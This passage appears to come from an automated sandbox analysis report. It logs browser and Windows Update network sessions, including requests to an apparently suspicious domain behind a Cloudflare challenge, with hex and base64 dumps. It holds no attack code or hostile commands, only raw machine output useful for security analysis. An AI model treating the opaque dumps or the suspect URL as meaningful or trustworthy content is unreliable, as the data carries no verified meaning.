                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 6c 2b 66 71 47 79 6b 35 53 6d 68 34 32 32 6b 4b 69 72 75 48 39 36 73 4a 57 36 6f 72 4b 68 6e 6f 53 49 76 61 61 59 76 36 69 6a 70 4a 2f 57 6f 4b 57 72 6b 63 65 4f 78 63 66 41 71 35 72 4c 31 73 57 39 6e 72 36 35 6f 4f 6e 41 31 38 61 6f 33 4d 47 6f 37 38 6a 66 7a 72 4c 6b 79 62 43 79 30 4f 66 57 73 50 33 54 38 4e 66 51 35 64 33 30 75 64 62 7a 77 73 50 56 2b 75 6e 36 79 2b 44 63 37 67 30 50 47 42 50 51 30 4f 54 32 46 64 63 67 47 39 67 4d 37 50 34 64 49 79 67 6a 34 42 7a 30 42 79 58 38 4d 43 76 6f 43 53 6b 49 39 41 6f 67 43 54 55 49 4e 44 49 65 4f 52 76 2b 50 42 72 35 48 51 41 43 51 78 41 6f 4f 55 67 34 51 68 73 39 50 53 63 64 48 43 39 4e 4b 67 30 52 4e 45 39 50 47 46 42 47 4c 7a 56 69 4e 54 6c 63 4a 44 46 49 4a 46 4d 31 4f 53 55 74 5a 30 67 71 54 30 38 37 4d
                                                                                                                  Data Ascii: l+fqGyk5Smh422kKiruH96sJW6orKhnoSIvaaYv6ijpJ/WoKWrkceOxcfAq5rL1sW9nr65oOnA18ao3MGo78jfzrLkybCy0OfWsP3T8NfQ5d30udbzwsPV+un6y+Dc7g0PGBPQ0OT2FdcgG9gM7P4dIygj4Bz0ByX8MCvoCSkI9AogCTUINDIeORv+PBr5HQACQxAoOUg4Qhs9PScdHC9NKg0RNE9PGFBGLzViNTlcJDFIJFM1OSUtZ0gqT087M
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 4f 64 48 68 2b 6c 62 36 41 72 5a 4f 55 6c 34 4f 51 6c 5a 75 42 68 4d 70 2f 76 62 71 75 6a 73 61 6d 6c 4c 62 45 78 64 48 50 70 72 66 56 74 70 79 62 7a 73 4c 58 72 61 7a 62 32 72 6d 32 77 61 72 66 71 4d 76 4b 78 75 61 37 72 63 37 4e 30 39 4c 48 7a 2b 6a 76 30 4f 66 56 33 64 6a 2b 74 2f 6e 37 2f 73 44 2b 38 63 62 30 39 64 50 2b 79 67 6f 50 79 38 33 6a 32 78 54 71 31 63 33 6c 45 66 59 58 38 41 72 30 43 51 2f 75 33 51 33 65 48 53 59 49 39 79 73 5a 4b 67 6e 71 49 41 66 77 4a 4f 34 4e 4c 2f 51 30 46 77 49 6f 2b 68 45 39 44 6a 41 54 46 50 6b 33 48 51 34 45 46 55 68 4a 43 69 67 65 54 6a 68 42 49 54 39 41 52 53 63 76 45 54 67 70 49 79 70 4d 4d 7a 68 49 59 42 70 53 59 56 59 65 4a 56 6c 69 58 54 74 55 50 6b 55 71 4a 55 4e 49 49 32 63 72 54 33 45 2b 56 6a 4d 76 56 55
                                                                                                                  Data Ascii: OdHh+lb6ArZOUl4OQlZuBhMp/vbqujsamlLbExdHPprfVtpybzsLXrazb2rm2warfqMvKxua7rc7N09LHz+jv0OfV3dj+t/n7/sD+8cb09dP+ygoPy83j2xTq1c3lEfYX8Ar0CQ/u3Q3eHSYI9ysZKgnqIAfwJO4NL/Q0FwIo+hE9DjATFPk3HQ4EFUhJCigeTjhBIT9ARScvETgpIypMMzhIYBpSYVYeJVliXTtUPkUqJUNII2crT3E+VjMvVU
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 6e 70 6d 66 72 37 69 65 6f 71 47 6d 6d 4a 65 33 69 4e 44 49 30 72 71 4b 6b 36 69 2f 6a 73 4f 77 6f 70 54 47 78 71 7a 65 34 4b 47 37 74 4e 53 31 32 72 72 58 6f 4f 72 42 78 71 69 70 36 75 50 6f 77 66 4c 77 38 37 44 4c 7a 62 53 35 78 38 33 70 33 4f 76 35 32 76 37 37 75 37 37 55 2f 74 33 66 2b 4d 54 68 78 74 33 42 36 38 7a 4d 2b 2b 72 31 45 51 50 6f 42 41 76 58 47 66 37 34 41 50 34 4b 33 79 48 32 48 75 44 67 43 50 59 41 47 79 55 4a 4b 79 59 47 49 78 34 71 4d 69 6a 6f 42 77 59 57 47 79 62 32 39 42 30 65 4c 67 44 35 4f 54 41 31 53 44 55 69 45 30 67 44 4c 67 6c 42 49 41 77 67 4d 7a 30 56 52 52 49 33 4d 69 73 38 45 6c 70 4b 53 78 6b 77 55 53 4d 7a 4d 6c 73 5a 4b 43 56 71 53 69 64 65 58 31 38 35 4d 45 6c 52 55 55 56 43 52 54 52 73 59 6b 74 4d 54 56 78 2f 53 55 35
                                                                                                                  Data Ascii: npmfr7ieoqGmmJe3iNDI0rqKk6i/jsOwopTGxqze4KG7tNS12rrXoOrBxqip6uPowfLw87DLzbS5x83p3Ov52v77u77U/t3f+MThxt3B68zM++r1EQPoBAvXGf74AP4K3yH2HuDgCPYAGyUJKyYGIx4qMijoBwYWGyb29B0eLgD5OTA1SDUiE0gDLglBIAwgMz0VRRI3Mis8ElpKSxkwUSMzMlsZKCVqSideX185MElRUUVCRTRsYktMTVx/SU5
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 63 71 79 6d 35 6d 44 68 49 71 4f 79 4b 6a 4c 71 36 75 51 74 61 43 71 73 4e 54 5a 73 35 69 39 7a 72 4b 34 32 64 6a 53 6f 4e 44 4a 78 61 6a 42 33 4d 69 73 7a 36 6e 73 72 76 48 53 72 4d 7a 6f 71 75 2f 54 38 4d 65 34 74 62 58 64 30 74 2f 51 31 2f 33 46 2f 4f 50 52 77 73 50 62 44 63 30 46 36 2b 66 6a 78 65 77 56 38 67 55 44 44 50 50 70 44 2f 66 65 43 68 58 73 37 43 4d 62 31 77 44 33 4a 66 67 59 35 2b 54 36 4b 69 4d 52 47 79 63 68 42 68 63 4a 43 43 6b 77 2b 52 30 36 44 43 6f 33 4b 68 6f 53 51 67 55 5a 4a 79 45 52 4d 7a 38 32 51 30 55 68 4a 30 46 49 45 6a 38 73 4a 45 4a 50 51 55 67 71 57 68 30 73 47 46 38 7a 53 7a 67 33 48 54 49 6e 4f 31 70 55 58 7a 78 64 51 6d 64 48 53 79 31 68 61 55 67 2b 55 31 52 68 62 57 5a 58 55 6a 74 7a 56 6b 46 69 56 56 52 31 66 45 56 62
                                                                                                                  Data Ascii: cqym5mDhIqOyKjLq6uQtaCqsNTZs5i9zrK42djSoNDJxajB3Misz6nsrvHSrMzoqu/T8Me4tbXd0t/Q1/3F/OPRwsPbDc0F6+fjxewV8gUDDPPpD/feChXs7CMb1wD3JfgY5+T6KiMRGychBhcJCCkw+R06DCo3KhoSQgUZJyERMz82Q0UhJ0FIEj8sJEJPQUgqWh0sGF8zSzg3HTInO1pUXzxdQmdHSy1haUg+U1RhbWZXUjtzVkFiVVR1fEVb


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.16497264.175.87.197443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:22 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gMNfPcGdfAFaFbr&MD=Wr9+2x7V HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-10-22 14:08:23 UTC560INHTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                  MS-CorrelationId: 9e513eae-6620-432f-829f-9b795364a7a1
                                                                                                                  MS-RequestId: fdc33da5-82ec-4f27-a347-d149034c21e2
                                                                                                                  MS-CV: kN96Xil+P0qlgcCN.0
                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:22 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 24490
                                                                                                                  2024-10-22 14:08:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                  2024-10-22 14:08:23 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.1649733188.114.97.34432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:22 UTC654OUTGET /favicon.ico HTTP/1.1
                                                                                                                  Host: apeidieppe-d.basiic.net
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/yKKWd/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: PHPSESSID=4ghhpb396a5ubs4qoebu2iv728
                                                                                                                  2024-10-22 14:08:23 UTC821INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:23 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=14400
                                                                                                                  CF-Cache-Status: EXPIRED
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OM5yjJ0VJtZ2suzhIvxM%2F09Rw4GnD7Q5seM8cH049LfQrpILNNjhBJxm9MkQnU17BE%2FHjCHTRfW%2FHj3r07nJpyoL3vFJSnEUcOvUceb3hhVahUXZqAw%2BWJDDDo77ZemLMlZgp4K4el0PgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f1ea82c6c08-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1266&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1232&delivery_rate=2116959&cwnd=251&unsent_bytes=0&cid=cc480cce3820975f&ts=404&x=0"
                                                                                                                  2024-10-22 14:08:23 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                  Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                  2024-10-22 14:08:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.164973435.190.80.14432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:23 UTC560OUTOPTIONS /report/v4?s=OM5yjJ0VJtZ2suzhIvxM%2F09Rw4GnD7Q5seM8cH049LfQrpILNNjhBJxm9MkQnU17BE%2FHjCHTRfW%2FHj3r07nJpyoL3vFJSnEUcOvUceb3hhVahUXZqAw%2BWJDDDo77ZemLMlZgp4K4el0PgQ%3D%3D HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:23 UTC336INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 0
                                                                                                                  access-control-max-age: 86400
                                                                                                                  access-control-allow-methods: POST, OPTIONS
                                                                                                                  access-control-allow-origin: *
                                                                                                                  access-control-allow-headers: content-type, content-length
                                                                                                                  date: Tue, 22 Oct 2024 14:08:23 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.1649735104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:24 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:24 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:24 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: JIxmdYlblECfFceUtlo7416LGWTmRn7Tx3I=$owI91Ya7tJtZrAX6
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f2809966c38-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:24 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.1649736104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:24 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8d6a0f0a98ece91e/1729606102483/7co4aaUL0qHQce5 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:24 UTC200INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:24 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f295e5b3066-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 45 08 02 00 00 00 ef 89 a0 a7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDREIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.164973735.190.80.14432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:24 UTC494OUTPOST /report/v4?s=OM5yjJ0VJtZ2suzhIvxM%2F09Rw4GnD7Q5seM8cH049LfQrpILNNjhBJxm9MkQnU17BE%2FHjCHTRfW%2FHj3r07nJpyoL3vFJSnEUcOvUceb3hhVahUXZqAw%2BWJDDDo77ZemLMlZgp4K4el0PgQ%3D%3D HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 442
                                                                                                                  Content-Type: application/reports+json
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:24 UTC442OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 36 31 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 65 69 64 69 65 70 70 65 2d 64 2e 62 61 73 69 69 63 2e 6e 65 74 2f 79 4b 4b 57 64 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d
                                                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":1610,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://apeidieppe-d.basiic.net/yKKWd/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-
                                                                                                                  2024-10-22 14:08:24 UTC168INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 0
                                                                                                                  date: Tue, 22 Oct 2024 14:08:24 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.1649738104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:25 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8d6a0f0a98ece91e/1729606102483/7co4aaUL0qHQce5 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:25 UTC200INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:25 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f2e0964a924-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:25 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 45 08 02 00 00 00 ef 89 a0 a7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDREIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.1649739104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:25 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8d6a0f0a98ece91e/1729606102485/2b499979905af05a4e97622bbcf04e6b2e9563bd02bab4a959d000ca1bfedbd1/epifzsflhhzta5x HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:25 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:25 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 1
                                                                                                                  Connection: close
                                                                                                                  2024-10-22 14:08:25 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4b 30 6d 5a 65 5a 42 61 38 46 70 4f 6c 32 49 72 76 50 42 4f 61 79 36 56 59 37 30 43 75 72 53 70 57 64 41 41 79 68 76 2d 32 39 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gK0mZeZBa8FpOl2IrvPBOay6VY70CurSpWdAAyhv-29EAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                  2024-10-22 14:08:25 UTC1INData Raw: 4a
                                                                                                                  Data Ascii: J


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.1649741104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
